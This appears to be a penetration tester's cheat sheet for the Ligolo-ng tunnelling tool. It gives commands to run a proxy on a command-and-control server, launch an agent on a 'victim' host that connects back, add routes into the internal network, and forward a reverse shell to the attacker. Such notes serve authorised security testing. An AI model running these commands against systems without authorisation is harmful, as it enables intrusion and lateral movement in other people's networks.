- a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a **tun interface** (**without the need of SOCKS**)
- [Quickstart - Ligolo-ng Documentation](https://docs.ligolo.ng/Quickstart/)

# Create a new tunnel device

Linux

```bash
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

# On Ligolo-ng >= v0.6, run this in the proxy console instead
# (--name is the name of the tun interface to create)
interface_create --name "<interface_name>"
```

Windows

- You need to download the `Wintun` driver (used by `WireGuard`) and place the `wintun.dll` in the same folder as Ligolo

# Start the Ligolo-ng proxy server

Start the *proxy* server on your C2 server

```bash
./proxy -h
./proxy -autocert # automatically request LetsEncrypt certificates
./proxy -selfcert # use self-signed certificates
```

# Start the agent

Start the *agent* on your target (victim) computer (no privileges are required)

```bash
./agent -connect <proxy_server>:<port>

# if the proxy server was started with -selfcert (the agent skips certificate verification)
./agent -connect <proxy_server>:<port> -ignore-cert
```

- A session should appear on the *proxy* server.
- Use the `session` command to select the *agent*.

# Add routes on the attacker machine

```bash
sudo ip route add 172.32.1.0/24 dev ligolo
ip route list

# or
autoroute
```

# Back to the proxy server and start ligolo

```bash
start

# when making a second tunnel
start --tun <tunnel_name>
```

# Set up listener and obtain reverse shell from `internal network` to attacker machine when they are in separate networks.

```bash
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4130 --tcp
listener_list
```